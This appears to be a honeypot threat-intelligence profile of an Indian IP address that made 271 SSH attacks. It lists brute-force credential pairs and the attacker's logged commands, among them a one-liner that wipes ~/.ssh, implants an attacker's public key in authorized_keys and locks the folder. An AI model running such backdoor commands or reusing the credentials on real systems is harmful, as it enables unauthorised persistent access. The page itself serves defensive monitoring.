โš TROYANOSYVIRUS
Active Threat โ€ข HIGH

49.207.241.59

First Detection2/19/2026
Last Activity2/22/2026
ISPAtria Convergence Technologies Pvt. Ltd. Broadband Internet Service Provider INDIA
๐ŸŽฏ
271
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
21
Malware

Geolocation

Country
๐Ÿ‡ฎ๐Ÿ‡ณ India
City
Bengaluru
ASN
AS24309
ISP
Atria Convergence Technologies Pvt. Ltd. Broadband Internet Service Provider INDIA

Attack Types

cowrie

Attacked Ports

22

Associated Malware

09a3e612f8cad1560057...โ†’28720365c5e7476a011e...โ†’28ba533b0f3c4df63d6b...โ†’30ac8ae3d869333e3ccf...โ†’3f1f9a5db692d999bb3d...โ†’

Attempted Credentials

๐Ÿ”345gs5662d34/345gs5662d34
5x
๐Ÿ”root/3245gs5662d34
2x
๐Ÿ”root/1a2b3c
1x
๐Ÿ”natalia/natalia
1x
๐Ÿ”claude/claude123
1x
๐Ÿ”celery/celery123!
1x
๐Ÿ”root/nPSpP4PBW0
1x
๐Ÿ”root/LeitboGi0ro
1x
๐Ÿ”claude/3245gs5662d34
1x
๐Ÿ”firewall/123456
1x
๐Ÿ”oracle/Bmw_20!_^
1x
๐Ÿ”john/1234
1x
๐Ÿ”ruixin/ruixin123!
1x
๐Ÿ”ruben/ruben
1x
๐Ÿ”elemental/E1ementa!5
1x

Executed Commands

$lockr -ia .ssh5x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~5x
$whoami2x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'2x
$lscpu | grep Model2x
$uname -a2x
$cd ~; chattr -ia .ssh; lockr -ia .ssh2x
$w2x
$which ls2x
$Enter new UNIX password:2x

Risk Assessment

60
/100
LowMediumHighCritical